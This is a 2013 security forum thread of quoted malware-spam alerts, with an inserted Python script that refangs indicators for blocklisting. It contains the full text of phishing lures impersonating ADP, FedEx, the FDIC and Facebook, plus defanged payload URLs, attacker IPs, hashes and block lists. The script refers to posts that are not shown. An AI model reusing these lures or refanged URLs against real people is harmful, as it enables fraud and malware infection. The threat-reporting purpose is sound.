Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 286532564
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.
The malicious payload is at [donotclick]elemikn .ru:8080/forum/links/column.php but at the moment the domain does not seem to be resolving (which is a good thing!)
___
Fake "Batch Payment File Reversed" SPAM / kendallvile .com
- http://blog.dynamoo.com/2013/01/batch-payment-file-reversed-spam.html
22 Jan 2013 - "This spam leads to malware on kendallvile .com:
From: batchservice @eftps .net [batchservice @eftps .net]
Date: 22 January 2013 17:56
Subject: Batch Payment File Reversed
=== PLEASE NOT REPLY TO THIS MESSAGE===
[redacted]
This notification was mailed to inform you that your payment file has Reversed. 2013-01-21-9.56.22.496135
Detailed information is accessible by sign into the Batch Provider with this link.
--
With Best Regards,
EFTPS
Contact Us: EFTPS Batch Provider Customer Service
This leads to an exploit kit on [donotclick]kendallvile .com/detects/exceptions_authority_distance_disturbing.php (report here*) hosted on the very familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea) which should be blocked if you can."
* http://www.urlquery.net/report.php?id=802578
:fear::mad::mad:
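The posts above keep recommending the same two defensive actions: turn the defanged indicators ("[donotclick]", "hxxp ://", the space before the TLD) back into something a blocklist can consume, and block whole ranges such as 82.145.57.0/25 and 93.190.40.0/21 rather than individual hosts. The dynamoo post on 109.123.66.30 also describes hijacked subdomains whose leftmost label is a long hex string. The following Python is an added example written for this thread, not code from any of the quoted blogs; the sample lines are constructed in the thread's own style, the IP addresses and CIDR ranges are the ones the posts list, and the domain names in the sample are placeholders.

```python
import ipaddress
import re

# Constructed sample lines in the thread's own defanging style. The IP addresses
# and ranges come from the posts; the domain names are placeholders.
SAMPLE_LINES = [
    "The malicious payload is at [donotclick]example-bad .ru:8080/forum/links/column.php",
    "hxxp ://example-update .ru/?a=RANDOM_CHARACTERS - 93.190.46.138",
    "hosted on 82.145.57.3 (Iomart / Rapidswitch) and 222.238.109.66 (Hanaro Telecom, Korea)",
    ("a1b2c3d4" * 8) + ".example-legit .com",   # hijacked-subdomain pattern: hex label
]

# Ranges the analysts in the thread recommended blocking as a whole.
BLOCKED_RANGES = [ipaddress.ip_network(c) for c in ("82.145.57.0/25", "93.190.40.0/21")]

DOMAIN_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)
HEX_LABEL_RE = re.compile(r"^[0-9a-f]{32,}$", re.I)


def refang(text):
    """Undo the thread's defanging so the indicators parse as real hosts/URLs:
    '[donotclick]' removed, 'hxxp ://' -> 'http://', 'host .tld' -> 'host.tld'."""
    text = text.replace("[donotclick]", "")
    text = re.sub(r"\bhxxp(s?) ?://", r"http\1://", text, flags=re.I)
    text = re.sub(r"(?<=\w) \.(?=\w)", ".", text)
    return text


def extract_indicators(text):
    """Return (ips, domains) found in one refanged line. Tokens are cut at the
    first '/' and ':' so ports, paths and query strings never leak into a host."""
    ips, domains = set(), set()
    for token in text.split():
        token = re.sub(r"^\w+://", "", token)            # drop the scheme
        token = token.split("/", 1)[0].split(":", 1)[0]  # drop path, then port
        token = token.strip("()[],.;\"'")
        try:
            ips.add(str(ipaddress.ip_address(token)))
            continue
        except ValueError:
            pass
        if DOMAIN_RE.match(token):
            domains.add(token.lower())
    return ips, domains


def triage(lines=SAMPLE_LINES, blocked_ranges=BLOCKED_RANGES):
    """Collect indicators across lines and apply the two checks the posts make:
    is an IP inside a range already recommended for blocking, and does a host
    look like a hijacked subdomain (leftmost label is a long hex blob)."""
    all_ips, all_domains = set(), set()
    for line in lines:
        ips, domains = extract_indicators(refang(line))
        all_ips |= ips
        all_domains |= domains
    in_blocked = sorted(ip for ip in all_ips
                        if any(ipaddress.ip_address(ip) in net for net in blocked_ranges))
    hex_subdomains = sorted(d for d in all_domains
                            if HEX_LABEL_RE.match(d.split(".", 1)[0]))
    return {
        "ips": sorted(all_ips),
        "ips_in_blocked_ranges": in_blocked,
        "domains": sorted(all_domains),
        "hex_label_subdomains": hex_subdomains,
    }


if __name__ == "__main__":
    for key, values in triage().items():
        print(f"{key}: {values}")
```

The tokeniser deliberately cuts at the first "/" before validating, so a path component such as column.php is never mistaken for a hostname; the hex-label check is a heuristic and should be reviewed by a person before anything is blocked on it alone.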
AplusWebMaster
2013-01-24, 16:15
FYI...
Fake Flash Updates - via SPAM attachment...
- http://www.gfi.com/blog/fake-adobe-flash-updates-resurfaces-in-the-web/
Jan 24, 2013 - "Following the return of fake Google Chrome browser updates almost two weeks ago, online criminals are now banking on fake Adobe Flash Player updates to lure the unwary user into downloading malware onto their system... spam emails claiming to be from the Better Business Bureau (BBB) and eFax Corporate... The BBB email contains an attachment that is found to be a Pony downloader that, once opened, downloads a variant of the ZeuS banking Trojan onto the affected user’s system. The said downloader also steals various passwords related to FTP sites..."
(Screenshots available at the gfi URL above.)
___
Malicious BT SPAM
- http://www.gfi.com/blog/beware-malicious-bt-spam-landing-in-inboxes/
Jan 24, 2013 - "... if you’re a client of the BT (British Telecom) Group, be warned that there is a new spam campaign under the guise of a “Notice of Delivery” mail* pretending to originate from BT Business Direct... Once users download and open the attached HTM file, they are -redirected- to a Russian website the file calls back to. The website serves a Blackhole Exploit Kit, which then downloads Cridex once it finds a software vulnerability..."
* http://gfisoftware.tumblr.com/post/41277073286/british-telecom-order-notice-attachment-spam
___
Fake ADP SPAM / 14.sofacomplete .com
- http://blog.dynamoo.com/2013/01/adp-spam-14sofacompletecom.html
24 Jan 2013 - "This fake ADP spam leads to malware on 14.sofacomplete .com:
From: Erna_Thurman @ADP .com Date: 24 January 2013 17:48
Subject: ADP Generated Message: Final Notice - Digital Certificate Expiration
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY. If you have any questions, please contact your administrator for assistance.
Digital Certificate About to Expire
The digital certificate you use to access ADP's Internet services is about to expire. If you do not renew your certificate by the expiration date below, you will not be able to access ADP's Internet services.
Days left before expiration: 1
Expiration date: Jan 25 23:59:59 GMT-03:59 2013
Renewing Your Digital Certificate
1. Go to this URL: https ://netsecure.adp .com/pages/cert/register2.jsp
2. Follow the instructions on the screen.
3. Also you can download new digital certificate at https ://netsecure.adp .com/pages/cert/pickUpCert.faces.
Deleting Your Old Digital Certificate
After you renew your digital certificate, be sure to delete the old certificate. Follow the instructions at the end of the renewal process.
The malicious payload is at [donotclick]14.sofacomplete .com/read/saint_hate-namely_fails.php hosted on 73.246.103.26 (Comcast, US). There will probably be other malicious domains on this same IP, so blocking it may be useful."
___
Fake LinkedIn emails lead to client-side exploits and malware
- http://blog.webroot.com/2013/01/24/fake-linkedin-invitation-notifications-themed-emails-lead-to-client-side-exploits-and-malware/
Jan 24, 2013 - "... Over the past 24 hours, cybercriminals have launched yet another massive spam campaign, impersonating LinkedIn, in an attempt to trick its users into clicking on the malicious links found in the bogus “Invitation Notification” themed emails. Once they click on the links, users are automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_linkedin_invitation_notification_email_spam_malware_exploits_black_hole_exploit_kit.png
... Name servers used by these malicious domains:
Name server: ns1.http-page .net – 31.170.106.17 – Email: ezvalue @yahoo .com
Name server: ns2.http-page .net – 7.129.51.158 – Email: ezvalue @yahoo .com
Name Server: ns1.high-grades .com – 208.117.43.145
Name Server: ns2.high-grades .com – 92.121.9.25
Sample malicious payload dropping URL:
hxxp ://shininghill .net/detects/solved-surely-considerable.php?vf=1o:31:1h:1l:2w&fe=33:1o:1g:1l:1m:1k:2v:1l:1o:32&n=1f&dw=w&qs=p
Upon successful client-side exploitation, the campaign drops MD5: fdc05614f56aca9421271887c1937f51 * ...Trojan-Spy.Win32.Zbot.ihgm.
Upon execution, the same creates the following process on the affected hosts:
%AppData%\Bytaa\yjdoly.exe
The following registry keys:
HKEY_CURRENT_USER\Software\Microsoft\Rekime
... Once executed, the sample also attempts to establish multiple UDP connections with the following IPs:
177.1.100.2 :11709
190.33.36.175 :11404
213.109.254.122 :29436
41.69.182.117 :29817
64.219.114.114 :13503
161.184.174.65 :14545
93.177.174.72 :10119
69.132.202.147 :16149..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/224c9e5c9b94738738c2e522770095d63bbd7eaaafa147283aca261df445b58d/analysis/
File name: info.ex_
Detection ratio: 30/44
Analysis date: 2013-01-23
___
Fake pharma sites 24/1/13
- http://blog.dynamoo.com/2013/01/fake-pharma-sites-24113.html
24 Jan 2013 - "Here's an updated list of fake RX sites being promoted through vague spam like this:
Date: Thu, 24 Jan 2013 04:44:45 +0000 (GMT)
From: "Account Info Change" [noreply @etraxx .com]
Subject: Updated information
Attention please:
- Over 50 new positions added (view recently added products)
- Free positions included with all accounts (read more here)
- The hottest products awaiting you in the first weeks of the new year (read more here)
- We want you to feel as comfortable as possible while you?re at our portal.
Click Here to Unsubscribe
As with a few days ago, these sites are hosted on:
199.59.56.59 (Hostwinds, Australia)
209.236.67.220 (WestHost Inc, US)
Currently active spamvertised sites are as follows:
(Long list available at the dynamoo URL above.)
___
Fake Efax Corporate SPAM / epimarkun .ru
- http://blog.dynamoo.com/2013/01/efax-corporate-spam-epimarkunru.html
24 Jan 2013 - "This fake eFax spam leads to malware on epimarkun .ru:
Date: Thu, 24 Jan 2013 04:04:42 +0600
From: Habbo Hotel [auto-contact @habbo .com]
Subject: Efax Corporate
Attachments: Efax_Corporate.htm
Fax Message [Caller-ID: 963153883]
You have received a 28 pages fax at Thu, 24 Jan 2013 04:04:42 +0600, (157)-194-4168.
* The reference number for this fax is [eFAX-009228416].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax ® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax ® Customer Agreement.
There is an attachment called Efax_Corporate.htm leading to a malicious payload at [donotclick]epimarkun .ru:8080/forum/links/column.php which is hosted on the following IPs:
50.31.1.104 (Steadfast Networks, US)
94.23.3.196 (OVH, France)
202.72.245.146 (Mongolian Railway Commercial Center, Mongolia)
These IPs and domains are all malicious:
50.31.1.104
94.23.3.196
202.72.245.146
dmssmgf .ru
esekundi .ru
esenstialin .ru
disownon .ru
epimarkun .ru
damagalko .ru
dumarianoko .ru
epiratko .ru
dfudont .ru ..."
:fear::mad:
AplusWebMaster
2013-01-25, 17:04
FYI...
Chase Phish, LinkedIn, American Express Open and Verizon Wireless Spam
- http://www.gfi.com/blog/email-threats-highlights-chase-phish-linkedin-american-express-open-and-verizon-wireless-spam/
Jan 25, 2013 - "In this week’s Email Threats roundup, we are highlighting spam and phishing campaigns that have made a comeback, such as LinkedIn and Chase spam, but took advantage of different social engineering lures this time around. You Know It’s Awkward When… you receive an email notification that claims to originate from LinkedIn, saying you have an event invitation from one of your employees; however, (1) you don’t own a company and (2) you don’t have people under you that you can call “employees.” Furthermore, isn’t LinkedIn Events the latest thing-of-the-past?... these don’t matter now. What does matter is that recipients should not click any of the malicious links in the message body as they lead to serious system infections..."
- http://gfisoftware.tumblr.com/post/40690037065/chase-online-credentials-phish
- http://gfisoftware.tumblr.com/post/40852233046/malicious-linkedin-spam
- http://gfisoftware.tumblr.com/post/40682042750/malicious-american-express-open-spam
- http://gfisoftware.tumblr.com/post/40603662118/malicious-verizon-wireless-spam
___
Fake Craigslist fax-to-email...
- http://techblog.avira.com/2013/01/25/malware-delivered-with-fake-craigslist-fax-to-email-notifications/en/
Jan 25, 2013 - "If you receive such a message containing an HTML page attached, don’t open it. The email pretends to come from “craigslist – automated message, do not reply <robot @craigslist .org>” and has the subject “Efax Corporate”...
> http://techblog.avira.com/wp-content/uploads/2013/01/craigslist-fax-malware.jpg
... contains malicious JavaScript code which would download malware on your computer.
> http://techblog.avira.com/wp-content/uploads/2013/01/craigslist-malware.jpg ..."
___
Fake UPS SPAM / eziponoma .ru
- http://blog.dynamoo.com/2013/01/ups-spam-eziponomaru.html
25 Jan 2013 - "This fake UPS spam leads to malware on eziponoma .ru:
From: messages-noreply @bounce .linkedin .com... On Behalf Of LinkedIn Password
Sent: 25 January 2013 04:12
Subject: UPS Tracking Number H0931698016
You can use UPS Services to:
Ship Online
Schedule a Pickup
Open a UPS Services Account
Welcome to UPS .com Customer Services
Hi, [redacted].
DEAR CLIENT , RECIPIENT'S ADDRESS IS WRONG
PLEASE PRINT OUT THE INVOICE COPY ATTACHED AND COLLECT THE PACKAGE AT OUR DEPARTMENT.
With Respect , Your UPS Customer Services...
The malicious payload is at [donotclick]eziponoma .ru:8080/forum/links/column.php which is hosted on:
94.23.3.196 (OVH, France)
195.210.47.208 (PS Internet Company, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)"
___
Fake FedEx SPAM / vespaboise .net
- http://blog.dynamoo.com/2013/01/fedex-spam-vespaboisenet.html
25 Jan 2013 - "This fake FedEx spam leads to malware on vespaboise .net:
Date: Fri, 25 Jan 2013 15:39:33 +0200
From: services @fedex .com
Subject: FedEx Billing - Bill Prepared to be Paid
FedEx Billing - Bill Prepared to be Paid
fedex.com
[redacted]
You have a new invoice(s) from FedEx that is prepared for discharge.
The following invoice(s) are ready for your overview:
Invoice Number
Invoice Amount
2-649-22849
49.81
1-181-19580
257.40
To pay or overview these invoices, please log in to your FedEx Billing Online account proceeding this link: http ://www.fedex .com/us/account/fbo
Note: Please do not use this email to submit payment. This email may not be used as a remittance notice. To pay your invoices, please visit FedEx Billing Online, http ://www.fedex .com/us/account/fbo
Thank you,
Revenue Services
FedEx
Please Not try to reply to this message. auto informer system cannot accept incoming mail.
The content of this message is protected by copyright and trademark laws under U.S. and international law.
review our privacy policy . All rights reserved.
The malicious payload is at [donotclick]vespaboise .net/detects/invoice_overview.php which is on the very familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea) which has been used in several recent attacks.. blocking it would be prudent."
___
Blackhole exploit kit - distribution
- http://www.symantec.com/connect/blogs/trojanpandex-new-spam-affair
Jan 24, 2013 - "... -redirect- ... to the following malicious URL:
dfudont .ru :8080/[REMOVED]/column.php...
BlackHole v2 exploit kit, and our telemetry data indicates that we have detected the following signatures from the malicious URL:
Web Attack: Blackhole Exploit Kit Website 8
Web Attack: Blackhole Exploit Kit
Web Attack: Blackhole Functions
Web Attack: Blackhole Toolkit Website 20
Web Attack: Blackhole Toolkit Website 31...
Heatmap distribution for IPS detections associated with Blackhole exploit kit:
> https://www.symantec.com/connect/sites/default/files/images/image4_26.png
... If the Blackhole exploit is successful, W32.Cridex* is then downloaded onto the compromised computer... ensure operating systems and software are up to date and to avoid clicking on suspicious links while browsing the Internet or checking email."
* W32.Cridex: https://www.symantec.com/security_response/writeup.jsp?docid=2012-012103-0840-99
W32.Cridex!gen1: https://www.symantec.com/security_response/writeup.jsp?docid=2012-032300-4035-99
- http://centralops.net/co/DomainDossier.aspx - Jan 25, 2013
canonical name dfudont .ru
addresses: 94.23.3.196, 195.210.47.208, 202.72.245.146
domain: DFUDONT .RU
nserver: ns1.dfudont .ru. 62.76.185.169
nserver: ns2.dfudont .ru. 41.168.5.140
nserver: ns3.dfudont .ru. 42.121.116.38
nserver: ns4.dfudont .ru. 110.164.58.250
nserver: ns5.dfudont .ru. 210.71.250.131
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person...
country: FR
origin: AS16276
- https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 7886 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-25, and the last time suspicious content was found was on 2013-01-25... we found 458 site(s) on this network... that appeared to function as intermediaries for the infection of 3498 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1447 site(s)... that infected 6601 other site(s)..."
- http://centralops.net/co/DomainDossier.aspx - Jan 27, 2013
canonical name dfudont .ru
addresses: 195.210.47.208, 202.72.245.146
domain: DFUDONT .RU
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person...
country: KZ - Kazakhstan
origin: AS48716
- https://www.google.com/safebrowsing/diagnostic?site=AS:48716
"... over the past 90 days, 25 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-27, and the last time suspicious content was found was on 2013-01-27... we found 6 site(s) on this network... that appeared to function as intermediaries for the infection of 5 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 23 site(s)... that infected 965 other site(s)..."
:mad: :fear:
AplusWebMaster
2013-01-27, 14:47
FYI...
Bogus BBB emails spread Zbot...
- http://www.hotforsecurity.com/blog/new-wave-of-bbb-scam-spreads-downloader-of-zbot-5135.html
Jan 25, 2013 - "... Better Business Bureau spam campaign.... the e-mails infect people with a Trojan that steals sensitive information from recipients... the BBB attack consists of a message supposedly from the Better Business Bureau telling recipients that a business customer has filed a formal complaint against them. The bogus e-mail invites the recipient to reply and mend the situation, but not before they open the attached document that, depending on the campaign, hides a downloader, a password stealer, and a BlackHole component. The subject line of these messages generally read: “complaint report,” “complaint ID,” “case” and a set of random digits. The bogus e-mails used in the January campaign carry as an attachment a zip file named “case” and arbitrary signs that hide a password stealer and a downloader of ZBot – identified by Bitdefender as Trojan.Generic.KD.835502. To make it more believable, attackers deliver the exe file with the Adobe Reader icon, so if file extensions are hidden by the operating system, chances are you’ll mistake it for a PDF document...
> http://www.hotforsecurity.com/wp-content/uploads/2013/01/New-wave-of-BBB-Scam-spreads-Downloader-of-ZBot.png
ZBot is a banker Trojan that steals e-banking information and logs keystrokes, but also has some limited backdoor and proxy features that allow its masters to take control of the machine. Crooks seem to find the BBB scam highly rewarding, as they refresh it several times a year since it was first spotted in 2010. It was November 2012 when Bitdefender anti-spam lab signaled another huge wave of BBB scam spreading Trojan.Generic.8271699, a downloader awfully similar to the infamous BlackHole exploit pack... Organizations such as the Better Business Bureau NEVER send complaints via e-mail with attachments and links, exactly to avoid frauds. EXE files are a big no-no in e-mail messages. In fact, they are so dangerous that no company will e-mail you this kind of attachment. If your e-mail messages carry an exe file, just get rid of it..."
___
Super Bowl Scams ...
- https://www.bbb.org/blog/2013/01/dont-fall-for-the-latest-super-bowl-scams/
Jan 22, 2013 - "... be on the alert for knock-off team jerseys, counterfeit memorabilia and phony game tickets... Tickets for the big game can be an even bigger rip-off. There are thousands of Super Bowl tickets currently listed on Craig’s List, but the site offers no guarantees of any kind and does not require identification of its listers. Buying in person isn’t always an improvement, as it’s gotten easier and easier for scammers to make fake tickets that look real... In general, avoid scams by being -skeptical- of:
• Offers that sound “too good to be true”
• Pushy sales tactics
• Poor quality of merchandise
• Offers that require wire transfer of funds ..."
More: https://www.bbb.org/blog/
___
Phishing Scams use Facebook Info for Personalized SPAM
- https://www.bbb.org/blog/2013/01/new-wave-of-phishing-scams-uses-facebook-info-for-personalized-spam/
Jan 25, 2013 - "... scammers are exploiting the fact that you’re more likely to click on a link if it was sent by a friend. Scammers find your information through Facebook or other social media accounts. Some set up fake accounts and send out friend requests. When you accept the request, they can view your friends and personal and contact information. Other scammers rely on social media users not locking down their privacy settings*, so basic information, such as your name, email address and friends’ names, is publicly available..."
* http://www.facebook.com/help/392235220834308/
:mad::sad:
AplusWebMaster
2013-01-28, 14:10
FYI...
Bogus Paypal emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/28/bogus-your-paypal-transaction-confirmation-themed-emails-lead-to-black-hole-exploit-kit/
Jan 28, 2013 - "... Over the past 24 hours, cybercriminals have launched yet another spam campaign, impersonating PayPal, in an attempt to trick its users into thinking that they’ve received a “Transaction Confirmation“, which in reality they never really made. Once users click on -any- of the links found in the malicious emails, they’re exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_paypal_transaction_confirmation_email_spam_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
duriginal .net – 222.238.109.66 – Email: blackchromedesign2 @ymail .com
Name server: NS1.HTTP-PAGE .NET – 31.170.106.17 – Email: ezvalue @yahoo .com
Name server: NS2.HTTP-PAGE .NET – 7.129.51.158 – Email: ezvalue @yahoo .com
The campaign shares the same infrastructure... three of these campaigns have been launched by the same malicious party.
Upon successful client-side exploitation, the campaign drops MD5: 423daf9994d552ca43f8958634ede6ee * ...Trojan-Spy.Win32.Zbot.ilmw..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/56af982933dac49ad067146971d60608964010f9bdc27c8ba69fa5e8eeafe199/analysis/
File name: contacts.exe
Detection ratio: 25/46
Analysis date: 2013-01-28
___
Zbot sites to block - 28/1/13
- http://blog.dynamoo.com/2013/01/zbot-sites-to-block-28113.html
28 Jan 2013 - "These domains and IPs are currently acting as C&C and distribution servers for Zbot. I would advise blocking these IPs and domains if you can. There are three parts to the list: IPs with hosting company names, plain IPs for copy-and-pasting and domains identified on these servers..."
(Long list at the dynamoo URL above.)
___
Fake Facebook SPAM / gonita .net
- http://blog.dynamoo.com/2013/01/most-recent-events-on-facebook-spam.html
28 Jan 2013 - "This fake Facebook spam leads to malware on gonita .net:
Date: Mon, 28 Jan 2013 17:30:50 +0100
From: "Facebook" [addlingabn2 @bmatter .com]
Subject: Most recent events on Facebook
facebook
Hi [redacted],
You have disabled your Facebook account. You can reveal your account whenever you wish by logging into Facebook with your old login email address and password. After that you will be able to enjoy the site in the same way as before.
Kind regards,
The Facebook Team
Log in to Facebook and start connecting
Sign in
Please use the link below to resume your account :
http ://www.facebook .com/resume/
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 419 P.O Box 10007 Palo Alto CA 94301
The malicious payload is at [donotclick]gonita .net/detects/sign_on_to_resume.php (report here) hosted on the well-known IP of 222.238.109.66 (Hanaro Telecom, Korea)... malicious domains are active on the same IP..."
:mad:
AplusWebMaster
2013-01-30, 16:05
FYI...
Intelius SPAM (or is it a data breach?)
- http://blog.dynamoo.com/2013/01/intelius-spam-or-is-it-data-breach.html
30 Jan 2013 - "This spam was sent to an email address only used to register for intelius.com. Either there has been a data breach at Intelius, or they have decided to go into the gambling business.
From: Grand Palace Slots [no-reply @tsm -forum .net]
Date: 30 January 2013 10:39
Subject: Try to play slots - 10$ free
Mailed-By: tsm-forum .net
Feel the unique excitement of playing at the world's premiere games!
Grand Palace gives you welcome package for slots up to 8,000$! What a fantastic offer, straight from the heart of World's gaming leader!
This is a great offer, especially when you see what else Grand Palace has to offer:
- US players welcome
- more than 100 fun games, realistic graphics
- the most secure and up-to-date software
- professional support staff to help you with whatever you might need, any time of the day or night!
And in the end we want to give you 10$ absolutelly free! (Use code CASH10)
Hurry up! Your free Grand Palace cash is waiting! Play Today!
http ://www .igrandpalacegold .com
Click here to opt out of this email:
http ://unsubscribe .igrandpalacegold .com
The originating IP is 176.200.202.100 (Telecom Italia, Italy), spamvertised site is www .igrandpalacegold .com on 91.217.52.125 (Fajncom SRO, Czech Republic)... I'm assuming that Intelius doesn't want to promote what would be illegal gambling for US citizens, which really leaves just one other option..."
___
Fake FedEx emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/29/fake-fedex-online-billing-invoice-prepared-to-be-paid-themed-emails-lead-to-black-hole-exploit-kit/
Jan 29, 2013 - "... Cybercriminals are currently mass mailing tens of thousands of emails impersonating the company, in an attempt to trick its customers into clicking on exploits and malware dropping links found in the legitimate-looking emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fedex_online_billing_fake_email_spam_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
vespaboise.net – 222.238.109.66 – Email: blackchromedesign2 @ymail .com
Name Server: NS1.HTTP-PAGE .NET
Name Server: NS2.HTTP-PAGE .NET
... Upon successful client-side exploitation, the FedEx themed campaign drops MD5: c2f72ff5b0cf4dec4ce33e4cc65796b1 * ...PWS:Win32/Zbot.gen!AM.
... It also attempts to connect to the following IPs:
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/1e896734d13002b29fd2a9d6594ed6bc938a83785b81be71b9788efbcc3bd1df/analysis/
File name: calc.exe
Detection ratio: 24/46
Analysis date: 2013-01-30
___
Malicious Spam Emails Target Nightclub Disaster in Santa Maria
- http://www.symantec.com/connect/blogs/malicious-spam-emails-target-nightclub-disaster-santa-maria
Jan 30, 2013 - "... spammers are distributing malicious emails that attempt to lure users into viewing a video of the incident that killed 233 people recently in a horrific tragedy at a popular nightclub in Santa Maria, Brazil. The malicious email is in Portuguese and invites unsuspecting users to click on a link to watch a video of the tragedy. The link provided in the email downloads a zip file containing a malicious control panel file as well as an executable file. Symantec detects this threat as Trojan Horse. Further analysis of the malicious file shows that the threat creates the following file:
%SystemDrive%\ProgramData\ift.txt
It also alters the registry entries for Internet Explorer. The threat then downloads an IE configuration file from a recently registered domain. Trojan Horse is usually a backdoor Trojan, downloader, or an infostealer. Samples of the spam emails are shown below (Figures 1 and 2). The email has the following characteristics:
Subject: Video mostra momento exato da tragedia em Santa Maria no Rio Grande Do Sul segunda-feira, 28 de janeiro de 2013
Subject: VIDEO DO ACIDENTE DA BOATE DE SANTA MARIA RS.
Translation: Video shows the beginning of the tragedy in Santa Maria, Rio Grande Do Sul Monday, January 28, 2013
Translation: Video of the Nightclub accident in Santa Maria RS
1) https://www.symantec.com/connect/sites/default/files/images/NightclubDisasterSpam1_0.png
2) https://www.symantec.com/connect/sites/default/files/images/NightclubDisasterSpam2_0.png
Users are advised to exercise caution when looking for videos, images, and news of recent popular events. Do not click on suspicious links or open attachments received in unsolicited emails. Keep your security software up-to-date in order to protect your information from online viruses and scams."
___
Fake FDIC SPAM / 1wstdfgh.organiccrap .com
- http://blog.dynamoo.com/2013/01/fdic-spam-1wstdfghorganiccrapcom.html
30 Jan 2013 - "Here's a slightly new spin on old spam, leading to malware on 1wstdfgh.organiccrap .com:
Date: Wed, 30 Jan 2013 16:16:32 +0200
From: "Тимур.Носков @fdic .gov" [midshipmanc631 @buprousa .com]
Subject: Important notice from FDIC
Attention!
Due to the adoption of a new security system, that is aimed at diminishing the number of cases of fraud and scams, all your ACH and WIRE transactions will be temporarily blocked until your security version meets the new requirements.. In order to restore your ability to make transactions, you are required to install a special security software. Please use the link below to download and install all the necessary files.
We apologize for causing you troubles by this measure.
If you need any assistance, please do not hesitate to contact us.
Sincerely yours,
Federal Deposit Insurance Corporation
Security Department
The link in the email goes through a legitimate hacked site (in this case [donotclick]www.edenespinosa .com/track .php?fdic) to the amusingly named [donotclick]1wstdfgh.organiccrap .com/closest/984y3fh8u3hfu3jcihei .php (report here*) hosted on 91.218.121.86 (CoolVDS / Kutcevol Maksum Mukolaevichm, US) which hosts the following suspect domains that you might want to block:
1wstdfgh.organiccrap .com
23v4tn6dgdr.organiccrap .com
v446numygjsrg.mymom .info
3vbtnyumv.ns02 .us
crvbhn7jbtd.mywww .biz "
* http://urlquery.net/report.php?id=891059
:mad:
AplusWebMaster
2013-01-31, 15:51
FYI...
Fake FDIC SPAM / 123435jynfbdf.myWWW .biz
- http://blog.dynamoo.com/2013/01/fdic-spam-123435jynfbdfmywwwbiz.html
31 Jan 2013 - "More FDIC themed spam, leading to a malicious payload on the same IP as this one:
From: ".Афанасьев @fdic .gov" [mailto:dickysmv341 @homesextapes .com]
Sent: 30 January 2013 15:03
Subject: Changing security requirements
Importance: High
Dear Sirs,
In connection with the introduction of a new security system for the purpose of preventing new cases of wire fraud, all your account ACH and WIRE transactions will be temporarily blocked unless the special security requirements are met.. In order to fully re-establish your account, you are asked to install a special security software. Please open the link below to download and install the latest security version.
We apologize for the inconveniences caused to you by this measure.
Please do not hesitate to contact us if you have any questions.
Yours faithfully,
Federal Deposit Insurance Corporation
Security Department
In this case the malicious payload is at [donotclick]123435jynfbdf.myWWW .biz./closest/984y3fh8u3hfu3jcihei.php and is hosted on 91.218.121.86 (CoolVDS / Kutcevol Maksum Mukolaevichm, US). At the moment the following domains seem to be active:
___
Malicious ‘Facebook Account Cancellation Request’ themed emails serve client-side exploits and malware
- http://blog.webroot.com/2013/01/31/malicious-facebook-account-cancellation-request-themed-emails-serve-client-side-exploits-and-malware/
Jan 31, 2013 - "In December, 2012, we intercepted a professional-looking email that was impersonating Facebook Inc. in an attempt to trick its users into thinking that they’ve received an “Account Cancellation Request“. In reality, once users clicked on the links, their hosts were automatically exploited through outdated and already patched client-side vulnerabilities, which dropped malware on the affected PCs. Over the past 24 hours, cybercriminals have resumed spamvertising tens of thousands of legitimate-looking Facebook themed emails, once again using the same social engineering theme...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_facebook_account_cancellation_request_email_spam_exploits_malware.png
... Sample client-side exploits served: CVE-2010-0188; CVE-2011-3544; CVE-2010-0840
... Malicious domain name reconnaissance:
kidstoytowers .com – 62.75.181.220 – responding to the same IP is also the following domain – dailyfrontiernews .com
Upon successful client-side exploitation, the campaign drops MD5: 9356fcd388b4bae53cad7aea4127d966 * ...W32/Injector.YMS!tr..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/d97f042474a0b1814fd681dca3ec2c5edf7054acff979f585a044478bc7c5cbd/analysis/
File name: test53356736863192.bin
Detection ratio: 3/46
Analysis date: 2013-01-28
___
Fake American Airlines email
- http://msmvps.com/blogs/spywaresucks/archive/2013/01/25/1823091.aspx
Jan 25 2013 - "This is -not- a real American Airlines / American Eagle email:
> http://msmvps.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/spywaresucks.metablogapi/0523.image_5F00_thumb_5F00_380EFE9A.png
